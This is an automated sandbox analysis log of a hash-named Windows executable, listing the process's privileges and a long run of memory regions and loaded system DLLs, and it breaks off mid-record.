# Flog Txt Version 1
# Analyzer Version: 2023.2.0
# Analyzer Build Date: Apr 13 2023 06:20:59
# Log Creation Date: 30.04.2023 00:31:28.749

Process:
	id = "1"
	image_name = "3729c1d683690f752732ec18372a555abfb0d20c02ea3f9fe60ca6577722c9a8.exe"
	filename = "c:\\users\\rdhj0cnfevzx\\desktop\\3729c1d683690f752732ec18372a555abfb0d20c02ea3f9fe60ca6577722c9a8.exe"
	page_root = "0x4e0cc000"
	os_pid = "0x117c"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "analysis_target"
	parent_id = "0"
	os_parent_pid = "0x424"
	cmd_line = "\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\3729c1d683690f752732ec18372a555abfb0d20c02ea3f9fe60ca6577722c9a8.exe\" "
	cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\"
	os_username = "XC64ZB\\RDhJ0CNFevzX"
	bitness = "32"
	os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f1a9" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]

Region:
	              id = 118
	        start_va = 0x10000
	          end_va = 0x2ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000010000"
	        filename = ""

Region:
	              id = 119
	        start_va = 0x30000
	          end_va = 0x44fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000030000"
	        filename = ""

Region:
	              id = 120
	        start_va = 0x50000
	          end_va = 0x8ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000050000"
	        filename = ""

Region:
	              id = 121
	        start_va = 0x90000
	          end_va = 0x18ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000090000"
	        filename = ""

Region:
	              id = 122
	        start_va = 0x190000
	          end_va = 0x193fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000190000"
	        filename = ""

Region:
	              id = 123
	        start_va = 0x1a0000
	          end_va = 0x1a0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000001a0000"
	        filename = ""

Region:
	              id = 124
	        start_va = 0x1b0000
	          end_va = 0x1b1fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000001b0000"
	        filename = ""

Region:
	              id = 125
	        start_va = 0x200000
	          end_va = 0x3fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000200000"
	        filename = ""

Region:
	              id = 126
	        start_va = 0xe20000
	          end_va = 0xe46fff
	       monitored = 1
	     entry_point = 0xe217b1
	     region_type = mapped_file
	            name = "3729c1d683690f752732ec18372a555abfb0d20c02ea3f9fe60ca6577722c9a8.exe"
	        filename = "\\Users\\RDhJ0CNFevzX\\Desktop\\3729c1d683690f752732ec18372a555abfb0d20c02ea3f9fe60ca6577722c9a8.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\3729c1d683690f752732ec18372a555abfb0d20c02ea3f9fe60ca6577722c9a8.exe")

Region:
	              id = 127
	        start_va = 0xf50000
	          end_va = 0xf51fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000f50000"
	        filename = ""

Region:
	              id = 128
	        start_va = 0x77040000
	          end_va = 0x771bafff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "ntdll.dll"
	        filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll")

Region:
	              id = 129
	        start_va = 0x7f760000
	          end_va = 0x7f782fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000000007f760000"
	        filename = ""

Region:
	              id = 130
	        start_va = 0x7ffe0000
	          end_va = 0x7ffeffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000007ffe0000"
	        filename = ""

Region:
	              id = 131
	        start_va = 0x7fff0000
	          end_va = 0x7ff95ae6ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000007fff0000"
	        filename = ""

Region:
	              id = 132
	        start_va = 0x7ff95ae70000
	          end_va = 0x7ff95b030fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "ntdll.dll"
	        filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")

Region:
	              id = 133
	        start_va = 0x7ff95b031000
	          end_va = 0x7ffffffeffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00007ff95b031000"
	        filename = ""

Region:
	              id = 272
	        start_va = 0x400000
	          end_va = 0x59ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000400000"
	        filename = ""

Region:
	              id = 273
	        start_va = 0x586b0000
	          end_va = 0x586fffff
	       monitored = 0
	     entry_point = 0x586c8180
	     region_type = mapped_file
	            name = "wow64.dll"
	        filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")

Region:
	              id = 274
	        start_va = 0x58630000
	          end_va = 0x586a9fff
	       monitored = 0
	     entry_point = 0x58643290
	     region_type = mapped_file
	            name = "wow64win.dll"
	        filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")

Region:
	              id = 275
	        start_va = 0x76d90000
	          end_va = 0x76e6ffff
	       monitored = 0
	     entry_point = 0x76da3980
	     region_type = mapped_file
	            name = "kernel32.dll"
	        filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")

Region:
	              id = 276
	        start_va = 0x58700000
	          end_va = 0x58707fff
	       monitored = 0
	     entry_point = 0x587017c0
	     region_type = mapped_file
	            name = "wow64cpu.dll"
	        filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")

Region:
	              id = 277
	        start_va = 0xf60000
	          end_va = 0x108ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000f60000"
	        filename = ""

Region:
	              id = 278
	        start_va = 0x76d90000
	          end_va = 0x76e6ffff
	       monitored = 0
	     entry_point = 0x76da3980
	     region_type = mapped_file
	            name = "kernel32.dll"
	        filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")

Region:
	              id = 279
	        start_va = 0x74590000
	          end_va = 0x7470dfff
	       monitored = 0
	     entry_point = 0x74641b90
	     region_type = mapped_file
	            name = "kernelbase.dll"
	        filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll")

Region:
	              id = 280
	        start_va = 0x10000
	          end_va = 0x1ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000010000"
	        filename = ""

Region:
	              id = 281
	        start_va = 0x7f660000
	          end_va = 0x7f75ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000000007f660000"
	        filename = ""

Region:
	              id = 282
	        start_va = 0x400000
	          end_va = 0x4bdfff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "locale.nls"
	        filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")

Region:
	              id = 283
	        start_va = 0x590000
	          end_va = 0x59ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000590000"
	        filename = ""

Region:
	              id = 284
	        start_va = 0x73cc0000
	          end_va = 0x73d51fff
	       monitored = 0
	     entry_point = 0x73d00380
	     region_type = mapped_file
	            name = "apphelp.dll"
	        filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll")

Region:
	              id = 285
	        start_va = 0x7f2b0000
	          end_va = 0x7f650fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "sysmain.sdb"
	        filename = "\\Windows\\AppPatch\\sysmain.sdb" (normalized: "c:\\windows\\apppatch\\sysmain.sdb")

Region:
	              id = 286
	        start_va = 0xf50000
	          end_va = 0xf53fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000f50000"
	        filename = ""

Region:
	              id = 287
	        start_va = 0x76950000
	          end_va = 0x76a96fff
	       monitored = 0
	     entry_point = 0x76961cf0
	     region_type = mapped_file
	            name = "user32.dll"
	        filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll")

Region:
	              id = 288
	        start_va = 0x75dc0000
	          end_va = 0x75f0efff
	       monitored = 0
	     entry_point = 0x75e76820
	     region_type = mapped_file
	            name = "gdi32.dll"
	        filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll")

Region:
	              id = 289
	        start_va = 0x1c0000
	          end_va = 0x1fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000001c0000"
	        filename = ""

Region:
	              id = 290
	        start_va = 0x5a0000
	          end_va = 0x69ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000005a0000"
	        filename = ""

Region:
	              id = 291
	        start_va = 0x76630000
	          end_va = 0x766aafff
	       monitored = 0
	     entry_point = 0x7664e970
	     region_type = mapped_file
	            name = "advapi32.dll"
	        filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll")

Region:
	              id = 292
	        start_va = 0x6faf0000
	          end_va = 0x6fb56fff
	       monitored = 0
	     entry_point = 0x6fb05a00
	     region_type = mapped_file
	            name = "winspool.drv"
	        filename = "\\Windows\\SysWOW64\\winspool.drv" (normalized: "c:\\windows\\syswow64\\winspool.drv")

Region:
	              id = 293
	        start_va = 0x76820000
	          end_va = 0x768ddfff
	       monitored = 0
	     entry_point = 0x76855630
	     region_type = mapped_file
	            name = "msvcrt.dll"
	        filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll")

Region:
	              id = 294
	        start_va = 0x75f10000
	          end_va = 0x75f53fff
	       monitored = 0
	     entry_point = 0x75f29d80
	     region_type = mapped_file
	            name = "sechost.dll"
	        filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll")

Region:
	              id = 295
	        start_va = 0x75ba0000
	          end_va = 0x75c4cfff
	       monitored = 0
	     entry_point = 0x75bb4f00
	     region_type = mapped_file
	            name = "rpcrt4.dll"
	        filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll")

Region:
	              id = 296
	        start_va = 0x71110000
	          end_va = 0x7112afff
	       monitored = 0
	     entry_point = 0x71119050
	     region_type = mapped_file
	            name = "bcrypt.dll"
	        filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll")

Region:
	              id = 297
	        start_va = 0x73d70000
	          end_va = 0x73d8dfff
	       monitored = 0
	     entry_point = 0x73d7b640
	     region_type = mapped_file
	            name = "sspicli.dll"
	        filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll")

Region:
	              id = 298
	        start_va = 0x73d60000
	          end_va = 0x73d69fff
	       monitored = 0
	     entry_point = 0x73d62a00
	     region_type = mapped_file
	            name = "cryptbase.dll"
	        filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll")

Region:
	              id = 299
	        start_va = 0x73e10000
	          end_va = 0x73e67fff
	       monitored = 0
	     entry_point = 0x73e525c0
	     region_type = mapped_file
	            name = "bcryptprimitives.dll"
	        filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll")

Region:
	              id = 300
	        start_va = 0x6a0000
	          end_va = 0x827fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000006a0000"
	        filename = ""

Region:
	              id = 301
	        start_va = 0xf60000
	          end_va = 0xf89fff
	       monitored = 0
	     entry_point = 0xf65680
	     region_type = mapped_file
	            name = "imm32.dll"
	        filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll")

Region:
	              id = 302
	        start_va = 0xf90000
	          end_va = 0x108ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000f90000"
	        filename = ""

Region:
	              id = 303
	        start_va = 0x75b70000
	          end_va = 0x75b9afff
	       monitored = 0
	     entry_point = 0x75b75680
	     region_type = mapped_file
	            name = "imm32.dll"
	        filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll")

Region:
	              id = 304
	        start_va = 0x20000
	          end_va = 0x20fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000020000"
	        filename = ""

Region:
	              id = 305
	        start_va = 0x4c0000
	          end_va = 0x4c0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000004c0000"
	        filename = ""

Region:
	              id = 306
	        start_va = 0x830000
	          end_va = 0x9b0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000830000"
	        filename = ""

Region:
	              id = 307
	        start_va = 0x1090000
	          end_va = 0x248ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000001090000"
	        filename = ""

Region:
	              id = 308
	        start_va = 0x2490000
	          end_va = 0x25bffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000002490000"
	        filename = ""

Region:
	              id = 309
	        start_va = 0xf60000
	          end_va = 0xf6ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000f60000"
	        filename = ""

Region:
	              id = 310
	        start_va = 0xf70000
	          end_va = 0xf78fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000f70000"
	        filename = ""

Region:
	              id = 311
	        start_va = 0x25c0000
	          end_va = 0x28f6fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "sortdefault.nls"
	        filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")

Region:
	              id = 312
	        start_va = 0xf80000
	          end_va = 0xf8afff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000f80000"
	        filename = ""

Region:
	              id = 313
	        start_va = 0x74770000
	          end_va = 0x75b6efff
	       monitored = 0
	     entry_point = 0x7492b990
	     region_type = mapped_file
	            name = "shell32.dll"
	        filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll")

Region:
	              id = 314
	        start_va = 0x75d80000
	          end_va = 0x75db6fff
	       monitored = 0
	     entry_point = 0x75d83b50
	     region_type = mapped_file
	            name = "cfgmgr32.dll"
	        filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll")

Region:
	              id = 315
	        start_va = 0x74090000
	          end_va = 0x74588fff
	       monitored = 0
	     entry_point = 0x74297610
	     region_type = mapped_file
	            name = "windows.storage.dll"
	        filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll")

Region:
	              id = 316
	        start_va = 0x73ed0000
	          end_va = 0x7408cfff
	       monitored = 0
	     entry_point = 0x73fb2a10
	     region_type = mapped_file
	            name = "combase.dll"
	        filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll")

Region:
	              id = 317
	        start_va = 0x766b0000
	          end_va = 0x766f4fff
	       monitored = 0
	     entry_point = 0x766cde90
	     region_type = mapped_file
	            name = "shlwapi.dll"
	        filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll")

Region:
	              id = 318
	        start_va = 0x764a0000
	          end_va = 0x764abfff
	       monitored = 0
	     entry_point = 0x764a3930
	     region_type = mapped_file
	            name = "kernel.appcore.dll"
	        filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll")

Region:
	              id = 319
	        start_va = 0x76790000
	          end_va = 0x7681cfff
	       monitored = 0
	     entry_point = 0x767d9b90
	     region_type = mapped_file
	            name = "shcore.dll"
	        filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll")

Region:
	              id = 320
	        start_va = 0x76ff0000
	          end_va = 0x77033fff
	       monitored = 0
	     entry_point = 0x76ff7410
	     region_type = mapped_file
	            name = "powrprof.dll"
	        filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll")

Region:
	              id = 321
	        start_va = 0x768e0000
	          end_va = 0x768eefff
	       monitored = 0
	     entry_point = 0x768e2e40
	     region_type = mapped_file
	            name = "profapi.dll"
	        filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll")

Region:
	              id = 322
	        start_va = 0x2490000
	          end_va = 0x2490fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000002490000"
	        filename = ""

Region:
	              id = 323
	        start_va = 0x25b0000
	          end_va = 0x25bffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000025b0000"
	        filename = ""

Region:
	              id = 324
	        start_va = 0x6fac0000
	          end_va = 0x6fae7fff
	       monitored = 0
	     entry_point = 0x6fac7820
	     region_type = mapped_file
	            name = "ntmarta.dll"
	        filename = "\\Windows\\SysWOW64\\ntmarta.dll" (normalized: "c:\\windows\\syswow64\\ntmarta.dll")

Region:
	              id = 325
	        start_va = 0x6fa40000
	          end_va = 0x6fab0fff
	       monitored = 0
	     entry_point = 0x6fa969e0
	     region_type = mapped_file
	            name = "efswrt.dll"
	        filename = "\\Windows\\SysWOW64\\efswrt.dll" (normalized: "c:\\windows\\syswow64\\efswrt.dll")

Region:
	              id = 326
	        start_va = 0x76cf0000
	          end_va = 0x76d81fff
	       monitored = 0
	     entry_point = 0x76d28cf0
	     region_type = mapped_file
	            name = "oleaut32.dll"
	        filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll")

Region:
	              id = 327
	        start_va = 0x6e780000
	          end_va = 0x6e847fff
	       monitored = 0
	     entry_point = 0x6e7eae90
	     region_type = mapped_file
	            name = "wintypes.dll"
	        filename = "\\Windows\\SysWOW64\\WinTypes.dll" (normalized: "c:\\windows\\syswow64\\wintypes.dll")

Region:
	              id = 328
	        start_va = 0x24a0000
	          end_va = 0x2589fff
	       monitored = 0
	     entry_point = 0x24dd650
	     region_type = mapped_file
	            name = "ole32.dll"
	        filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll")

Region:
	              id = 329
	        start_va = 0x6f9f0000
	          end_va = 0x6fa38fff
	       monitored = 0
	     entry_point = 0x6f9f6450
	     region_type = mapped_file
	            name = "edputil.dll"
	        filename = "\\Windows\\SysWOW64\\edputil.dll" (normalized: "c:\\windows\\syswow64\\edputil.dll")

Region:
	              id = 330
	        start_va = 0x71140000
	          end_va = 0x7134cfff
	       monitored = 0
	     entry_point = 0x7122acb0
	     region_type = mapped_file
	            name = "wininet.dll"
	        filename = "\\Windows\\SysWOW64\\wininet.dll" (normalized: "c:\\windows\\syswow64\\wininet.dll")

Region:
	              id = 331
	        start_va = 0x73950000
	          end_va = 0x73c1afff
	       monitored = 0
	     entry_point = 0x73b8c4c0
	     region_type = mapped_file
	            name = "iertutil.dll"
	        filename = "\\Windows\\SysWOW64\\iertutil.dll" (normalized: "c:\\windows\\syswow64\\iertutil.dll")

Region:
	              id = 332
	        start_va = 0x24a0000
	          end_va = 0x24a0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "counters.dat"
	        filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\INetCache\\counters.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\inetcache\\counters.dat")

Region:
	              id = 333
	        start_va = 0x76aa0000
	          end_va = 0x76afefff
	       monitored = 0
	     entry_point = 0x76aa4af0
	     region_type = mapped_file
	            name = "ws2_32.dll"
	        filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll")

Region:
	              id = 334
	        start_va = 0x710f0000
	          end_va = 0x71101fff
	       monitored = 0
	     entry_point = 0x710f4510
	     region_type = mapped_file
	            name = "ondemandconnroutehelper.dll"
	        filename = "\\Windows\\SysWOW64\\OnDemandConnRouteHelper.dll" (normalized: "c:\\windows\\syswow64\\ondemandconnroutehelper.dll")

Region:
	              id = 335
	        start_va = 0x710c0000
	          end_va = 0x710eefff
	       monitored = 0
	     entry_point = 0x710cbb70
	     region_type = mapped_file
	            name = "iphlpapi.dll"
	        filename = "\\Windows\\SysWOW64\\IPHLPAPI.DLL" (normalized: "c:\\windows\\syswow64\\iphlpapi.dll")

Region:
	              id = 336
	        start_va = 0x71020000
	          end_va = 0x710bafff
	       monitored = 0
	     entry_point = 0x7105f7e0
	     region_type = mapped_file
	            name = "winhttp.dll"
	        filename = "\\Windows\\SysWOW64\\winhttp.dll" (normalized: "c:\\windows\\syswow64\\winhttp.dll")

Region:
	              id = 337
	        start_va = 0x4d0000
	          end_va = 0x50ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000004d0000"
	        filename = ""

Region:
	              id = 338
	        start_va = 0x9c0000
	          end_va = 0xabffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000009c0000"
	        filename = ""

Region:
	              id = 339
	        start_va = 0x764b0000
	          end_va = 0x764b6fff
	       monitored = 0
	     entry_point = 0x764b1e10
	     region_type = mapped_file
	            name = "nsi.dll"
	        filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll")

Region:
	              id = 340
	        start_va = 0x70600000
	          end_va = 0x70683fff
	       monitored = 0
	     entry_point = 0x70626530
	     region_type = mapped_file
	            name = "dnsapi.dll"
	        filename = "\\Windows\\SysWOW64\\dnsapi.dll" (normalized: "c:\\windows\\syswow64\\dnsapi.dll")

Region:
	              id = 341
	        start_va = 0x70fd0000
	          end_va = 0x7101efff
	       monitored = 0
	     entry_point = 0x70fdd850
	     region_type = mapped_file
	            name = "mswsock.dll"
	        filename = "\\Windows\\SysWOW64\\mswsock.dll" (normalized: "c:\\windows\\syswow64\\mswsock.dll")

Region:
	              id = 342
	        start_va = 0x70fc0000
	          end_va = 0x70fc7fff
	       monitored = 0
	     entry_point = 0x70fc1fc0
	     region_type = mapped_file
	            name = "winnsi.dll"
	        filename = "\\Windows\\SysWOW64\\winnsi.dll" (normalized: "c:\\windows\\syswow64\\winnsi.dll")

Region:
	              id = 343
	        start_va = 0x510000
	          end_va = 0x54ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000510000"
	        filename = ""

Region:
	              id = 344
	        start_va = 0x550000
	          end_va = 0x58ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000550000"
	        filename = ""

Region:
	              id = 345
	        start_va = 0xac0000
	          end_va = 0xbbffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000ac0000"
	        filename = ""

Region:
	              id = 346
	        start_va = 0xbc0000
	          end_va = 0xcbffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000bc0000"
	        filename = ""

Region:
	              id = 347
	        start_va = 0x71350000
	          end_va = 0x714cdfff
	       monitored = 0
	     entry_point = 0x713cc630
	     region_type = mapped_file
	            name = "urlmon.dll"
	        filename = "\\Windows\\SysWOW64\\urlmon.dll" (normalized: "c:\\windows\\syswow64\\urlmon.dll")

Region:
	              id = 348
	        start_va = 0x24b0000
	          end_va = 0x24b0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000024b0000"
	        filename = ""

Region:
	              id = 349
	        start_va = 0x24c0000
	          end_va = 0x24c2fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "mswsock.dll.mui"
	        filename = "\\Windows\\SysWOW64\\en-US\\mswsock.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\mswsock.dll.mui")

Region:
	              id = 350
	        start_va = 0x24d0000
	          end_va = 0x24d7fff
	       monitored = 0
	     entry_point = 0x24d19c0
	     region_type = mapped_file
	            name = "wshqos.dll"
	        filename = "\\Windows\\SysWOW64\\wshqos.dll" (normalized: "c:\\windows\\syswow64\\wshqos.dll")

Region:
	              id = 351
	        start_va = 0x24e0000
	          end_va = 0x24e0fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "wshqos.dll.mui"
	        filename = "\\Windows\\SysWOW64\\en-US\\wshqos.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\wshqos.dll.mui")

Region:
	              id = 352
	        start_va = 0x24d0000
	          end_va = 0x24d7fff
	       monitored = 0
	     entry_point = 0x24d19c0
	     region_type = mapped_file
	            name = "wshqos.dll"
	        filename = "\\Windows\\SysWOW64\\wshqos.dll" (normalized: "c:\\windows\\syswow64\\wshqos.dll")

Region:
	              id = 353
	        start_va = 0x24e0000
	          end_va = 0x24e0fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "wshqos.dll.mui"
	        filename = "\\Windows\\SysWOW64\\en-US\\wshqos.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\wshqos.dll.mui")

Region:
	              id = 354
	        start_va = 0x24d0000
	          end_va = 0x24d7fff
	       monitored = 0
	     entry_point = 0x24d19c0
	     region_type = mapped_file
	            name = "wshqos.dll"
	        filename = "\\Windows\\SysWOW64\\wshqos.dll" (normalized: "c:\\windows\\syswow64\\wshqos.dll")

Region:
	              id = 355
	        start_va = 0x24e0000
	          end_va = 0x24e0fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "wshqos.dll.mui"
	        filename = "\\Windows\\SysWOW64\\en-US\\wshqos.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\wshqos.dll.mui")

Region:
	              id = 356
	        start_va = 0x24d0000
	          end_va = 0x24d7fff
	       monitored = 0
	     entry_point = 0x24d19c0
	     region_type = mapped_file
	            name = "wshqos.dll"
	        filename = "\\Windows\\SysWOW64\\wshqos.dll" (normalized: "c:\\windows\\syswow64\\wshqos.dll")

Region:
	              id = 357
	        start_va = 0x24e0000
	          end_va = 0x24e0fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "wshqos.dll.mui"
	        filename = "\\Windows\\SysWOW64\\en-US\\wshqos.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\wshqos.dll.mui")

Region:
	              id = 358
	        start_va = 0x24d0000
	          end_va = 0x24dffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000024d0000"
	        filename = ""

Region:
	              id = 359
	        start_va = 0x70dd0000
	          end_va = 0x70de2fff
	       monitored = 0
	     entry_point = 0x70dd9950
	     region_type = mapped_file
	            name = "cryptsp.dll"
	        filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll")

Region:
	              id = 360
	        start_va = 0x72a60000
	          end_va = 0x72a8efff
	       monitored = 0
	     entry_point = 0x72a795e0
	     region_type = mapped_file
	            name = "rsaenh.dll"
	        filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll")

Region:
	              id = 361
	        start_va = 0x2900000
	          end_va = 0x29d9fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000002900000"
	        filename = ""

Region:
	              id = 362
	        start_va = 0x29e0000
	          end_va = 0x2ac7fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000029e0000"
	        filename = ""

Region:
	              id = 363
	        start_va = 0x2900000
	          end_va = 0x2c96fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000002900000"
	        filename = ""

Region:
	              id = 364
	        start_va = 0x2ca0000
	          end_va = 0x303afff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000002ca0000"
	        filename = ""

Region:
	              id = 365
	        start_va = 0x2900000
	          end_va = 0x29e3fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000002900000"
	        filename = ""

Region:
	              id = 366
	        start_va = 0x29f0000
